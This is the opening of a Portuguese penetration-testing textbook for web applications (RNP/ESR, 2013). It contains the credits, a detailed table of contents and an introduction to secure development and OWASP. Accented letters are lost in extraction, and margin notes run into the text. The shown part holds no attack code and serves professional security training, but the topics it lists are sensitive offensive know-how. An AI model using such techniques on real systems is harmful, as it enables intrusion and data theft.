Teste de Invasão de Aplicações Web

Teste de Invaso
de Aplicaes
Web
Nelson Uto
Teste de Invaso
de Aplicaes
Web
Nelson Uto
Teste de Invaso
de Aplicaes
Web
Nelson Uto
Rio de Janeiro
Escola Superior de Redes
2013
Copyright 2013 Rede Nacional de Ensino e Pesquisa RNP
Rua Lauro Mller, 116 sala 1103
22290-906 Rio de Janeiro, RJ
Diretor Geral
Nelson Simes
Diretor de Servios e Solues

Jos Luiz Ribeiro Filho

Coordenao
Luiz Coelho
Edio
Pedro Sangirardi
Coordenao Acadmica de Segurana e Governana de TI

Edson Kowask
Equipe ESR (em ordem alfabtica)

Celia Maciel, Cristiane Oliveira, Derlina Miranda, Elimria Barbosa, Lanusa Silva,
Lourdes Soncin, Luciana Batista, Luiz Carlos Lobato, Renato Duarte e Sergio de Souza
Capa, projeto visual e diagramao

Tecnodesign
Verso
1.1.0
Este material didtico foi elaborado com fins educacionais. Solicitamos que qualquer erro encon-
trado ou dvida com relao ao material ou seu uso seja enviado para a equipe de elaborao de
contedo da Escola Superior de Redes, no e-mail info@esr.rnp.br. A Rede Nacional de Ensino e
Pesquisa e os autores no assumem qualquer responsabilidade por eventuais danos ou perdas, a
pessoas ou bens, originados do uso deste material.
As marcas registradas mencionadas neste material pertencem aos respectivos titulares.
Distribuio
Rua Lauro Mller, 116 sala 1103
22290-906 Rio de Janeiro, RJ
http://esr.rnp.br
info@esr.rnp.br
Dados Internacionais de Catalogao na Publicao (CIP)
U91s UTO, Nelson.

Teste de invaso de aplicaes web / Nelson Uto. Rio de Janeiro: RNP/ESR, 2013.
510 p. : il. ; 27,5 cm
ISBN 978-85-63630-17-9
1. Computadores Medidas de segurana. 2. Hackers. 3. Software Manuteno.

Testes. 4. Crime por computador Preveno. I. Ttulo.
CDD 005.8
Sumrio
1. Segurana em aplicaes web

Introduo1
Exerccio de nivelamento 1 Desenvolvimento de software3
Ciclo de desenvolvimento de software seguro3
Exerccio de fixao 1 Atividades de segurana5
OWASP5
Arquiteturas e tecnologias de aplicaes web6
Exerccio de nivelamento 2 Requisitos de segurana8
Reviso de criptografia8
Cifras9
Funes de hash criptogrficas11
MACs11
Assinaturas digitais12
Certificados digitais12
Protocolos SSL e TLS13
Exerccio de fixao 2 Segurana da informao15
Reviso dos protocolos HTTP e HTTPS16
Requisio16
Resposta17
Mtodos18
Cdigos de estado18
Cabealhos18
Cookies19
Autenticao HTTP19
Exerccio de fixao 3 Protocolo HTTP20
iii
Esquemas de codificao20
Codificao de URL20
Codificao HTML21
Roteiro de Atividades 123
Atividade 1 Arquiteturas e tecnologias de aplicaes web23
Atividade 2 Mecanismos criptogrficos23
Bibliografia 134
2. Reconhecimento e mapeamento
Introduo 37
Exerccio de nivelamento 1 Teste de invaso38
Metodologia de teste de invaso39
Exerccio de fixao 1 Etapas de um teste de invaso42
Ferramentas bsicas42
Navegadores web43
Proxies de interceptao44
Web spiders46
Fuzzers47
Varredores de portas e servios47
Varredores de vulnerabilidades48
Outras ferramentas49
Exerccio de fixao 2 Tipos de ferramentas50
Reconhecimento51
Levantamento de informaes em fontes pblicas52
Google hacking52
Identificao de sistema operacional, servios e portas55
Identificao do servidor web56
Levantamento dos mtodos suportados pelos servidores web59
Deteco de hosts virtuais59
Descoberta de arquivos e diretrios60
Exerccio de fixao 3 Fase de reconhecimento62
Mapeamento62
Cpia das pginas e recursos da aplicao62
Identificao dos pontos de entrada de informao63
Relacionamento com as informaes de reconhecimento64
Exerccio de nivelamento 2 Validao unilateral64
iv
Descoberta de vulnerabilidades e explorao65
Explorao de controles no lado cliente65
Exerccio de fixao 4 Segurana de controles67
Contramedidas67
Atividade 1 Ferramentas bsicas69
Atividade 2 Reconhecimento74
Atividade 3 Mapeamento79
Atividade 4 Descoberta e explorao de vulnerabilidades82
Bibliografia 285
3. Teste do mecanismo de autenticao

Introduo87
Exerccio de fixao 1 Autenticao de usurio88
Exerccio de nivelamento 1 Autenticao de entidades88
Tecnologias de autenticao empregadas em aplicaes web89
Exerccio de nivelamento 2 Vulnerabilidades 94
Uso de informaes obtidas nas fases de reconhecimento e mapeamento95
Usurio e senha padronizados97
Enumerao de identificadores de usurios98
Mecanismo vulnervel de recuperao de senhas101
Funcionalidade Lembrar usurio103
Transporte inseguro de credenciais de acesso103
Falhas na implementao do mecanismo104
Mecanismo vulnervel de troca de senhas107
Autenticao com mltiplos fatores108
Ataque de fora bruta109
Ataque de dicionrio110
Ataque contra senhas armazenadas114
Inexistncia de poltica de senhas forte117
Negao de servio direcionada a usurios119
Engenharia social119
Exerccio de fixao 2 Vulnerabilidades em mecanismos de autenticao120
Contramedidas120
v
Atividade 1 Tecnologias de autenticao 123
Atividade 2 Descoberta de vulnerabilidades e explorao123
Bibliografia 3132
4. Teste do gerenciamento de sesses

Introduo133
Exerccio de fixao 1 Identificador de sesso135
Exerccio de nivelamento 1 Gerenciamento de sesses136
Identificadores de sesso previsveis136
Domnio de identificadores com baixa cardinalidade140
Transmisso em claro de identificadores de sesso141
Manipulao de identificador de sesso por meio de scripts142
Atributos de cookies144
Exerccio de fixao 2 Atributos para proteo146
Sequestro de sesso146
Ataque de fixao de sesso147
Encerramento vulnervel de sesso152
Sesses simultneas de um mesmo usurio152
Cross site request forgery153
Exerccio de fixao 3 Cross site request forgery157
Clickjacking157
Contramedidas163
Atividade 1 Introduo ao gerenciamento de sesses 165
Bibliografia 4177
5. Cross-site scripting
Introduo179
Exerccio de nivelamento 1 Cross-site scripting180
Tipos de XSS180
XSS refletido181
XSS armazenado182
vi
XSS baseado em DOM182
Cross channel scripting185
Exerccio de fixao 1 XSS186
Worms baseados em XSS186
Exerccio de fixao 2 Tcnicas de evaso189
Pontos de injeo189
Roteiros de teste191
Obteno de identificador de sesso192
Adulterao de pgina194
Descoberta de histrico de navegao197
Captura de teclas digitadas no navegador web200
Quebra de token anti-CSRF201
Exerccio de fixao 3 Proteo contra CSRF202
Evaso de filtros202
Arcabouos de explorao204
Contramedidas207
Cdigo do Samy Worm207
Cdigo do Yamanner209
Atividade 1 Introduo215
Atividade 2 Tipos de XSS 215
Atividade 3 Worms baseados em XSS218
Bibliografia 5231
6. Injeo de SQL
Introduo233
Exerccio de nivelamento 1 Consulta SQL problemtica235
Exerccio de fixao 1 Injeo de SQL235
Especificidades de alguns SGBDs236
Comandos de manipulao de dados236
Empilhamento de comandos237
Expresso condicional237
Comando de pausa238
Manipulao de caracteres e de cadeias de caracteres238
vii
Operadores bit-a-bit239
Comentrios239
Locais de injeo240
Testes bsicos241
Extrao de dados via UNION244
Identificao do servidor de banco de dados e de outras informaes247
Identificao das colunas da consulta249
Exerccio de fixao 2 Enumerao de tabelas via injeo de SQL250
Escalada de privilgios250
Descoberta e extrao de tabelas256
Manipulao de arquivos262
Funo definida pelo usurio270
Execuo de comandos no sistema operacional278
Varredura de redes280
Partio e balanceamento285
Injeo de SQL s cegas286
Exerccio de fixao 3 Ataque de injeo de SQL295
Injeo de SQL de segunda ordem295
Evaso de filtros296
Contramedidas297
Exerccio de fixao 4 Stored procedures 298
Atividade 1 Especificidades de SGBDs299
Bibliografia 6313
7. Ataques de injeo
Introduo315
Exerccio de nivelamento 1 Ataques de injeo316
Injeo de comandos de sistema operacional316
Injeo em trilhas de auditoria319
Poluio de parmetros HTTP321
Injeo em filtros LDAP324
Injeo em filtros LDAP s cegas328
Injeo de comandos SMTP e de cabealhos de e-mail330
viii
Injeo de XPath335
Injeo de XPath s cegas339
Incluso de arquivos342
Contramedidas343
Exerccio de fixao 2 Medidas contra ataques344
Apndice Gramtica para representao textual de filtros de busca LDAP345
Gramtica da linguagem XPath 1.0347
Atividade 1 Injeo de comandos de sistema operacional 351
Atividade 2 Injeo em trilhas de auditoria352
Atividade 3 Poluio de parmetros HTTP353
Atividade 4 Injeo em filtros LDAP356
Atividade 5 Injeo em filtros LDAP s cegas358
Atividade 6 Injeo de comandos SMTP e de cabealhos de e-mail359
Atividade 7 Injeo de XPath362
Atividade 8 Injeo de XPath s cegas363
Atividade 9 Incluso de arquivos364
Bibliografia 7367
8. Teste do mecanismo de autorizao e da lgica de negcio

Introduo369
Exerccio de nivelamento 1 Vulnerabilidades em aplicaes web371
Acesso direto a recursos371
Acesso direto a pginas371
Uso do cabealho HTTP Referer372
Acesso direto a objetos373
Acesso direto a recursos estticos375
Exerccio de fixao 1 Aplicaes vulnerveis376
Controle de acesso no lado cliente da aplicao376
Autorizao no lado cliente da aplicao376
Manuteno de perfil no lado cliente da aplicao377
Proteo de referncias a objetos378
Percurso de caminho379
Redirecionamento no validado383
ix
Condies de corrida386
Exerccio de fixao 2 Condies de corrida387
Vulnerabilidades na lgica de negcio387
Transferncia de valor negativo388
Emprstimo acima do limite388
Exerccio de fixao 3 Ferramentas automatizadas390
Contramedidas390
Atividade 1 Acesso direto a recursos 393
Atividade 2 Controle de acesso no lado cliente da aplicao 397
Atividade 3 Percurso de caminho400
Atividade 4 Redirecionamento no validado401
Atividade 5 Condies de corrida403
Atividade 6 Vulnerabilidades na lgica de negcio404
Bibliografia 8405
9. Mecanismos criptogrficos
Introduo407
Exerccio de nivelamento 1 Acesso aplicao web408
Vulnerabilidades no transporte de informaes408
Verso vulnervel de SSL411
Suporte a sutes criptogrficas fracas412
Problemas com o certificado digital417
Acesso a domnio no verificado417
Uso de protocolos proprietrios418
Exerccio de fixao 1 Tipos de vulnerabilidades419
Contramedidas419
Vulnerabilidades no armazenamento de informaes420
Uso de BASE64421
Exerccio de fixao 2 BASE64422
Identificao e quebra de cifras clssicas422
Exerccio de nivelamento 2 Chave criptogrfica443
Recuperao de chaves embutidas em cdigo443
Gerao de chaves com baixa entropia444
Emprego de modo de operao inadequado445
x
Exerccio de fixao 3 ECB449
Uso incorreto de algoritmos criptogrficos449
Mistura de algoritmos com nveis de segurana diferentes451
Exerccio de fixao 4 Ataque a algoritmos452
Uso de algoritmos criptogrficos com fraquezas conhecidas452
Proteo de senhas de usurios453
Proteo de dados de cartes de pagamento454
Contramedidas455
Atividade 1 Vulnerabilidades no transporte de informaes457
Atividade 2 Vulnerabilidades no armazenamento de informaes459
Bibliografia 9467
10. Escrita de relatrios e exerccio completo

Introduo469
Common Vulnerability Scoring System470
Base470
Exerccio de fixao 2 Perigo de vulnerabilidades474
Tipos de relatrios474
Relatrio detalhado474
Relatrio executivo477
Exerccio de fixao 3 Resultado de teste de invaso477
Apndice477
Tabela de escore de base de acordo com o CVSS477
Exemplo de relatrio detalhado479
Exemplo de sumrio executivo485
Atividade 1 Teste da aplicao Vicnum 487
Atividade 2 Capture a bandeira 487
Bibliografia 10489
xi
xii
A Escola Superior de Redes (ESR) a unidade da Rede Nacional de Ensino e Pesquisa
(RNP) responsvel pela disseminao do conhecimento em Tecnologias da Informao e
Comunicao (TIC).
A ESR nasce com a proposta de ser a formadora e disseminadora de competncias em

TIC para o corpo tcnico-administrativo das universidades federais, escolas tcnicas e
unidades federais de pesquisa. Sua misso fundamental realizar a capacitao tcnica
do corpo funcional das organizaes usurias da RNP, para o exerccio de competncias
aplicveis ao uso eficaz e eficiente das TIC.
A ESR oferece dezenas de cursos distribudos nas reas temticas: Administrao e Pro-
jeto de Redes, Administrao de Sistemas, Segurana, Mdias de Suporte Colaborao
Digital e Governana de TI.
A ESR tambm participa de diversos projetos de interesse pblico, como a elaborao

e execuo de planos de capacitao para formao de multiplicadores para projetos
educacionais como: formao no uso da conferncia web para a Universidade Aberta do
Brasil (UAB), formao do suporte tcnico de laboratrios do Proinfo e criao de um con-
junto de cartilhas sobre redes sem fio para o programa Um Computador por Aluno (UCA).
A metodologia da ESR
A filosofia pedaggica e a metodologia que orientam os cursos da ESR so baseadas na
aprendizagem como construo do conhecimento por meio da resoluo de problemas tpi-
cos da realidade do profissional em formao. Os resultados obtidos nos cursos de natureza
terico-prtica so otimizados, pois o instrutor, auxiliado pelo material didtico, atua no
apenas como expositor de conceitos e informaes, mas principalmente como orientador do
aluno na execuo de atividades contextualizadas nas situaes do cotidiano profissional.
A aprendizagem entendida como a resposta do aluno ao desafio de situaes-problema

semelhantes s encontradas na prtica profissional, que so superadas por meio de anlise,
sntese, julgamento, pensamento crtico e construo de hipteses para a resoluo do pro-
blema, em abordagem orientada ao desenvolvimento de competncias.
Dessa forma, o instrutor tem participao ativa e dialgica como orientador do aluno para as
atividades em laboratrio. At mesmo a apresentao da teoria no incio da sesso de apren-
dizagem no considerada uma simples exposio de conceitos e informaes. O instrutor
busca incentivar a participao dos alunos continuamente.
xiii
As sesses de aprendizagem onde se do a apresentao dos contedos e a realizao das
atividades prticas tm formato presencial e essencialmente prtico, utilizando tcnicas
de estudo dirigido individual, trabalho em equipe e prticas orientadas para o contexto de
atuao do futuro especialista que se pretende formar.
As sesses de aprendizagem desenvolvem-se em trs etapas, com predominncia de

tempo para as atividades prticas, conforme descrio a seguir:
Primeira etapa: apresentao da teoria e esclarecimento de dvidas (de 60 a 90 minutos).

O instrutor apresenta, de maneira sinttica, os conceitos tericos correspondentes ao tema
da sesso de aprendizagem, com auxlio de slides em formato PowerPoint. O instrutor
levanta questes sobre o contedo dos slides em vez de apenas apresent-los, convidando
a turma reflexo e participao. Isso evita que as apresentaes sejam montonas e que o
aluno se coloque em posio de passividade, o que reduziria a aprendizagem.
Segunda etapa: atividades prticas de aprendizagem (de 120 a 150 minutos).

Esta etapa a essncia dos cursos da ESR. A maioria das atividades dos cursos assncrona e
realizada em duplas de alunos, que acompanham o ritmo do roteiro de atividades proposto no
livro de apoio. Instrutor e monitor circulam entre as duplas para solucionar dvidas e oferecer
explicaes complementares.
Terceira etapa: discusso das atividades realizadas (30 minutos).

O instrutor comenta cada atividade, apresentando uma das solues possveis para
resolv-la, devendo ater-se quelas que geram maior dificuldade e polmica. Os alunos so
convidados a comentar as solues encontradas e o instrutor retoma tpicos que tenham
gerado dvidas, estimulando a participao dos alunos. O instrutor sempre estimula os
alunos a encontrarem solues alternativas s sugeridas por ele e pelos colegas e, caso
existam, a coment-las.
Sobre o livro
O livro apresenta uma metodologia de verificao da segurana por meio da simulao de
ataques reais, explorando as vulnerabilidades de um ambiente, plataforma ou sistema, os
quais so reconhecidamente os principais meios explorados para roubo de informaes
confidenciais e invaso de redes corporativas.
Para ser um profissional de pentest, preciso muito mais do que utilizar ferramentas
automatizadas: so necessrios conhecimentos diferenciados e tcnicas avanadas que
permitam a compreenso ampla de cenrios de vulnerabilidades.
Este livro apoia o curso de formao destes novos profissionais atravs das melhores pr-
ticas para testes de invaso, contendo atividades de simulao de ataques em ambiente de
teste virtualizado. Ao final do curso, o aluno estar apto a avaliar a eficincia da segurana
de sua organizao, e a propor o modelo de maturidade em segurana de software mais
adequado sua necessidade.
A quem se destina
Curso voltado para tcnicos, analistas e administradores de redes que desejam obter o
conhecimento sobre tcnicas, padres internacionais e ferramental para realizao de tes-
tes de invaso em aplicaes web. Tambm indicado para tcnicos e gestores responsveis
pelo desenvolvimento e suporte de sistemas, e para profissionais de computao interes-
sados em adquirir conhecimento diferencial na rea de segurana ciberntica.
xiv
Convenes utilizadas neste livro
As seguintes convenes tipogrficas so usadas neste livro:
Itlico
Indica nomes de arquivos e referncias bibliogrficas relacionadas ao longo do texto.
Largura constante
Indica comandos e suas opes, variveis e atributos, contedo de arquivos e resultado da

sada de comandos.
Contedo de slide
Indica o contedo dos slides referentes ao curso apresentados em sala de aula.
Smbolo
Indica referncia complementar disponvel em site ou pgina na internet.
Smbolo
Indica um documento como referncia complementar.
Smbolo
Indica um vdeo como referncia complementar.
Smbolo
Indica um arquivo de adio como referncia complementar.
Smbolo
Indica um aviso ou precauo a ser considerada.
Smbolo
Indica questionamentos que estimulam a reflexo ou apresenta contedo de apoio ao
entendimento do tema em questo.
Smbolo
Indica notas e informaes complementares como dicas, sugestes de leitura adicional ou
mesmo uma observao.
Permisses de uso
Todos os direitos reservados RNP.
Agradecemos sempre citar esta fonte quando incluir parte deste livro em outra obra.
Exemplo de citao: UTO, Nelson. Teste de Invaso de Aplicaes Web. Rio de Janeiro: Escola
Superior de Redes, RNP, 2013.
Comentrios e perguntas
Para enviar comentrios e perguntas sobre esta publicao:
Escola Superior de Redes RNP
Endereo: Av. Lauro Mller 116 sala 1103 Botafogo
Rio de Janeiro RJ 22290-906
E-mail: info@esr.rnp.br
xv
Sobre os autores
Nelson Uto bacharel e mestre em Cincia da Computao pela Universidade Estadual de
Campinas Unicamp. Durante o mestrado, realizado sob superviso do Prof. Dr. Ricardo
Dahab, abordou a segurana de sistemas de agentes mveis e implementou, para a plata-
forma Aglets da IBM, alguns dos mecanismos estudados. Neste mesmo perodo, avaliou
artigos para congressos nacionais em Segurana da Informao e para o peridico Journal
of Universal Computer Science. Possui, tambm, vrios artigos publicados em congressos
nacionais e internacionais, discorrendo sobre diversos temas de Segurana da Informa-
o. Trabalha na rea de TI h 15 anos, sendo 9 deles em Segurana da Informao e, em
especial, em criptografia aplicada e segurana de software. Nesta rea, dentre os projetos
de pesquisa e de consultoria dos quais participou, pode-se citar: criptoanlise de arquivos
gerados por malwares; testes de invaso de aplicaes web e cliente-servidor; anlise de
vulnerabilidades em implementaes criptogrficas; aplicao da tcnica K-Means para a
gerao semiautomtica de regras de correlao de eventos de segurana; gerenciamento
de chaves criptogrficas; anlise de bibliotecas com suporte Criptografia de Curvas Elpti-
cas para as plataformas XScale e x86; verificao da correo dos algoritmos criptogrficos
implementados por uma biblioteca comercial; anlise de riscos de sistemas com base na
norma ISO/IEC 18028; avaliao de vulnerabilidades de sistemas operacionais e SGBDs;
elaborao de polticas de segurana e auditoria PCI. Tem experincia no desenvolvimento
de softwares em linguagens C, C++, Java e Assembly x86. Como projetos mais interessan-
tes nesse domnio esto a criao de um driver ODBC-JDBC e um tradutor 4GL-Java, para a
gerao automtica de cdigo semanticamente equivalente em Java a partir de programas
em 4GL. Por fim, professor de graduao e ps-graduao, ministrando disciplinas nas
reas de Segurana e Tecnologia da Informao, alm de coordenar h trs anos um curso
de ps-graduao em segurana.
Edson Kowask Bezerra profissional da rea de segurana da informao e governana

h mais de quinze anos, atuando como auditor lder, pesquisador, gerente de projetos e
gerente tcnico, em inmeros projetos de gesto de riscos, gesto de segurana da infor-
mao, continuidade de negcios, PCI, auditoria e recuperao de desastres em empresas
de grande porte do setor de telecomunicaes, financeiro, energia, indstria e governo.
Com vasta experincia nos temas de segurana, tem atuado tambm como palestrante nos
principais eventos do Brasil e ainda como instrutor de treinamentos focados em segurana
e governana. professor e coordenador de cursos de ps-graduao na rea de segurana
da informao, gesto integrada, de inovao e tecnologias web. Hoje atua como Coordena-
dor Acadmico de Segurana e Governana de TI da Escola Superior de Redes.
xvi
Dedico este trabalho:
Marcia Hoffmann, pela companhia, amor e pacincia;
minha famlia, pela educao que me foi dada;
Aos verdadeiros amigos, que sempre me estenderam a mo quando precisei;
A todos os autores que, ao compartilharem conhecimento, auxiliaram a criao deste livro.
Nelson Uto
xvii
xviii
1
Segurana em aplicaes web
objetivos
Introduzir conceitos sobre desenvolvimento de software seguro e rever diversos

tpicos relacionados criptografia e aos protocolos HTTP e HTTPS.
conceitos
Ciclo de desenvolvimento de software seguro, arquiteturas e tecnologias de
aplicaes web, criptografia, pro-tocolos HTTP e HTTPS.
Introduo
Vulnerabilidades em softwares tm sido amplamente utilizadas por atacantes para q
roubo de informaes confidenciais e invases de redes corporativas.
Prover a segurana de um software, porm, no um objetivo fcil de ser alcanado,

dada a complexidade dos sistemas nos dias de hoje.
Facilmente, eles atingem dezenas de milhares de linhas de cdigo, que contm, invariavel-
mente, quantidade de defeitos significativa. Alguns destes tm impacto direto em segurana,
podendo acarretar desde a indisponibilidade do sistema at o controle total do computador
por um atacante. Para piorar ainda mais esse cenrio, considere que, normalmente, um
ciclo de desenvolvimento de software seguro no adotado, o que resulta, no mnimo, em
especificaes inseguras e configurao vulnervel das plataformas subjacentes.
Common Para se ter uma ideia mais clara do mundo real, no perodo de 2001 a 2006 o nmero de
Vulnerabilites
and Exposures vulnerabilidades em sistemas reportado ao Common Vulnerabilities and Exposures sim-
Dicionrio pblico plesmente triplicou. Alm disso, houve mudana nos tipos de fraquezas mais comumente
contendo descries
encontradas, como possvel observar na Figura 1. O extravasamento de buffer, campeo
de vulnerabilidades de
Captulo 1 - Segurana em aplicaes web
segurana descobertas. da lista por muitos anos consecutivos, perdeu o lugar, a partir de 2005, para vulnerabili-
SQL dades de injeo de cdigo, como o cross-site scripting e injeo de SQL, por exemplo. Esses
Structured Query tipos de fraquezas afetam, basicamente, sistemas web e indicam duas coisas:
Language uma
linguagem baseada 1 A recente popularizao das interfaces web para comrcio eletrnico, internet banking
na lgebra relacional, e configurao de elementos de rede.
que utilizada para
manipular informaes 1 Os problemas de segurana desse domnio no esto sendo adequadamente conside-
contidas em bancos de rados durante o processo de desenvolvimento, tanto por ignorncia como pela presso
dados relacionais.
causada por cronogramas de entrega apertados.
Extravasamento de buffer uma vulnerabilidade comum em programas escritos em lin-

guagem de baixo nvel e ocorre quando possvel escrever em uma regio de memria alm
1
dos limites alocados para uma dada estrutura, como um vetor, por exemplo. O resultado da
explorao do problema pode ser desde um trmino abrupto do programa at o controle
total do sistema operacional.
% do total de vulnerabilidades reportado ao CVE
25
20
15
Cross-site scripting
Extravasamento de buer
10
Injeo SQL
Navegao de diretrio
5 PHP Include
Vazamento de informao
Negao de servio
0
2001 2002 2003 2004 2005 2006 Estouro de inteiro
Ano
possvel considerar, de modo geral, que nem um software est livre de vulnerabilidades de Figura 1.1
segurana, principalmente quando a complexidade deles for grande. Progresso da ocor-
q
rncia das principais
A melhor estratgia a ser adotada, ento, consiste em encontrar essas vulnerabilidades vulnerabilidades
reportadas ao CVE.
o mais cedo possvel e corrigi-las imediatamente, antes que sejam exploradas por usu-
rios maliciosos. Veja algumas maneiras de realizar essa tarefa:
1 Anlise de documentos de requisitos, projeto e arquitetura: permite detectar

problemas no projeto e arquitetura da aplicao.
1 Anlise de cdigo-fonte: a melhor ferramenta possvel para deteco de vulnerabi-

lidades em software, mas pode ser proibitiva para sistemas muito grandes, devido ao
tempo que a tarefa consome. Alguns tipos de defeitos de segurana, porm, somente
podem ser encontrados dessa maneira.
1 Teste de invaso: esse o tema deste curso e consiste na execuo de ataques visando
violar os requisitos de segurana explcitos e implcitos de uma aplicao. O processo
todo realizado ciclicamente e, a cada interao, a base de conhecimento sobre o
sistema aumenta e novas vulnerabilidades podem ser descobertas e exploradas.
1 Ferramentas automatizadas: so timas para auxiliar um analista de segurana na

execuo de processos repetitivos e deteco de alguns tipos de vulnerabilidades.
Porm, no so capazes de encontrar inmeras classes de problemas, que necessitam de
um conhecimento do domnio da aplicao e da semntica dos parmetros utilizados.
Teste de Invaso de Aplicaes Web
Vale ressaltar que vulnerabilidades em software, frequentemente, so as responsveis

pelo comprometimento do bem mais importante da empresa, que a informao. Assim,
esforos devem ser direcionados para mitigar os riscos decorrentes da criao e utilizao
de softwares inseguros nos processos de negcio das empresas. Tal objetivo s alcanado
plenamente por meio da implantao de um ciclo de desenvolvimento de software seguro.
No contexto apresentado, o objetivo deste captulo revisar os principais conceitos necessrios

realizao de um teste de invaso de aplicaes web. Desse modo, o restante deste captulo
inclui noes de um ciclo de desenvolvimento de software seguro, arquiteturas e tecnologias de
aplicaes web, conceitos de criptografia e reviso dos protocolos HTTP e HTTPS.
2
Exerccio de nivelamento 1 e
Desenvolvimento de software
Sua organizao adota um ciclo de desenvolvimento de software seguro?
Ciclo de desenvolvimento de software seguro

Um software seguro aquele que satisfaz os requisitos implcitos e explcitos de segu- q
rana em condies normais de operao e em situaes decorrentes de atividade mali-
ciosa de usurios. Para isso, deve resultar de um ciclo de desenvolvimento que considere
aspectos de segurana em todas as suas fases (McGraw, 2006; Kissel et al., 2008):
1 Na etapa de especificao, requisitos explcitos de segurana devem ser enumerados

e requisitos funcionais devem ser avaliados para verificar se no introduzem uma
vulnerabilidade no sistema.
1 Atividades comumente realizadas na fase seguinte, a de projeto, incluem o mapea-

mento do modelo de dados para estruturas lgicas e fsicas, a definio de padres
de interface a serem utilizados, a escolha de elementos de hardware e software que
faro parte da soluo e o desenho da topologia a ser adotada.
1 Para minimizar vulnerabilidades de codificao, os desenvolvedores devem ser trei-

nados em tcnicas gerais de programao segura e nas especificidades das lingua-
gens com as quais trabalham.
1 Testes de segurana so fundamentalmente diferentes de testes funcionais e, por

isso, devem ser feitos por profissionais especializados.
1 Por fim, e no menos importantes, encontram-se a implantao do sistema no

ambiente de produo e a manuteno.
Todavia, muitos desenvolvedores comeam a se preocupar com segurana somente quando

o software est quase finalizado, pois acreditam, erroneamente, ser possvel trabalhar
dessa maneira. Tal abordagem s contribui para maior custo, pois as correes de vulnerabi-
lidades tornam-se mais caras medida que se avana pelas fases de desenvolvimento,
conforme ilustrado na Figura 1.2, extrada de Wysopal et al. (2006).
Fase Custo relativo para correo
Definio 1
Projeto de alto nvel 2

Projeto detalhado 5
Codificao 10
Teste de unidade 15
Figura 1.2
Custo relativo de Teste de integrao 22
correo de software
de acordo com a Teste de sistema 50
fase do ciclo de
desenvolvimento. Ps-entrega 100
3
Cada fase de um ciclo de desenvolvimento de software seguro, portanto, tem sua parcela de
contribuio para a qualidade do resultado final e no pode ser omitida durante o processo.
Na etapa de especificao, requisitos explcitos de segurana devem ser enumerados e
requisitos funcionais devem ser avaliados para verificar se no introduzem uma vulnerabi-
lidade no sistema. Um caso ilustrativo o do suposto Microsoft Bob, um programa criado
para auxiliar o usurio do sistema operacional sempre que se encontrasse em dificuldades
na realizao de alguma tarefa. Seguindo essa filosofia, sempre que um usurio errasse
a senha trs vezes consecutivas, ele aparecia e perguntava se desejava troc-la, para
conectar-se ao ambiente (McGraw, 2006). Nessa situao, no importa quo bem implemen-
tada esteja a funcionalidade: o sistema continuar intrinsecamente inseguro.
Atividades comumente realizadas na fase seguinte, a de projeto, incluem o mapeamento

do modelo de dados para estruturas lgicas e fsicas, a definio de padres de interface a
serem utilizados, a escolha de elementos de hardware e software que faro parte da soluo
e o desenho da topologia a ser adotada. Nesse contexto, um problema muito comum de
segurana que surge o posicionamento incorreto do banco de dados na topologia de rede.
Para ilustrar esse ponto, considere o levantamento realizado por Litchfield, no final de 2005,
em que foram detectados cerca de 350 mil bancos de dados, contendo dados de produo
diretamente na DeMilitarized Zone DMZ externa das empresas (Litchfield, 2007). Esse DMZ
exemplo evidencia pelo menos um dos inmeros aspectos de segurana que devem ser con- Segmento de rede que
separa redes protegidas
siderados no projeto do software, ao lado de decises sobre protocolos seguros de comuni-
de no protegidas,
cao e seleo de algoritmos criptogrficos. como a internet,
e utilizado para
O prximo passo consiste na implementao do software propriamente dito, em uma ou prover servios para
mais linguagens de programao, dependendo de cada caso. Para minimizar vulnerabi- o ambiente externo.
Assim, servidores web
lidades de codificao, os desenvolvedores devem ser treinados em tcnicas gerais de
e de correio eletrnico
programao segura e nas especificidades das linguagens com as quais trabalham. Por normalmente so
exemplo, extravasamento de buffer um problema comum em programas feitos em C e instalados na DMZ. O
termo tem origem na
C++ (Seacord, 2005), mas no ocorre na linguagem Java, pois a mquina virtual verifica se
regio de terra neutra
um acesso a um vetor est dentro dos limites possveis. Ferramentas automatizadas para que separa as Coreias
reviso de cdigo podem ser de grande ajuda na identificao de padres reconhecida- do Norte e do Sul.
mente inseguros de programao, como o uso das funes strcpy() e strcmp() em C/C++.
Testes de segurana so fundamentalmente diferentes de testes funcionais e, por isso,

devem ser feitos por profissionais especializados. Os ltimos so descritos em casos de
testes, os quais definem um roteiro dos passos a serem seguidos e o resultado esperado de
um comportamento no defeituoso. Obviamente, nenhum sistema criado com caminhos
documentados de como os requisitos de segurana podem ser subjugados, e a reside a
diferena. Portanto, ao procurar vulnerabilidades em um software, o testador segue uma
linha de raciocnio diferente da tradicional, ao colocar-se no lugar do usurio malicioso, que
tenta encontrar fluxos no previstos que possam comprometer a aplicao. A automao
de algumas tarefas nesse processo pode implicar ganho de produtividade, mas o papel do
especialista continua sendo fundamental.
Por fim, e no menos importantes, encontram-se a implantao do sistema no ambiente

de produo e a manuteno. Antes da liberao para o uso, fundamental que todos os
servidores utilizados pela aplicao sejam robustecidos, com eliminao de servios e contas
desnecessrios e configurao dos parmetros de segurana de acordo com as melhores
prticas estabelecidas para as plataformas. Correes de segurana devem ser aplicadas
periodicamente no ambiente, principalmente, aquelas consideradas crticas. Caso criptossis-
temas com chave sejam empregados, procedimentos adequados de gerenciamento de chaves
4
criptogrficas devem ser adotados (Menezes et al., 2001; Barker et al., 2007a,b). E, no caso de
comprometimento do sistema, o problema deve ser identificado e imediatamente corrigido.
Invariavelmente, todo software sempre apresenta uma ou mais falhas de segurana ao

longo de sua existncia. Assim, razovel concluir que utpico construir um sistema
completamente invulnervel. Porm, com um ciclo de desenvolvimento seguro, possvel,
no mnimo, produzir consistentemente sistemas com um nmero reduzido de brechas e que
possuam mecanismos de proteo contra os diversos ataques conhecidos.
Exerccio de fixao 1 e
Atividades de segurana
Que atividades de segurana podem ser includas em cada etapa de um ciclo de desenvolvi-
mento de software seguro?
OWASP
O grupo Open Web Application Security Project uma organizao mundial, sem fins lucra-
tivos, que visa divulgar aspectos de segurana de aplicaes web, para que o risco nesses
ambientes seja devidamente avaliado por pessoas e empresas. Existem, hoje, 130 captulos
locais, espalhados pelos cinco continentes, todos abertos, gratuitamente, para participao
de pessoas interessadas no assunto. A entidade, alm de organizar conferncias internacio-
nais e encontros sobre o tema, mantm diversos projetos, que variam de guias de imple-
mentao segura a ferramentas.
Os trabalhos do OWASP relevantes para este curso esto brevemente descritos nos q
pargrafos a seguir:
1 Top Ten: uma lista, j na terceira verso, das dez vulnerabilidades de maior risco
presentes em aplicaes web, segundo a experincia prtica de diversos especialistas
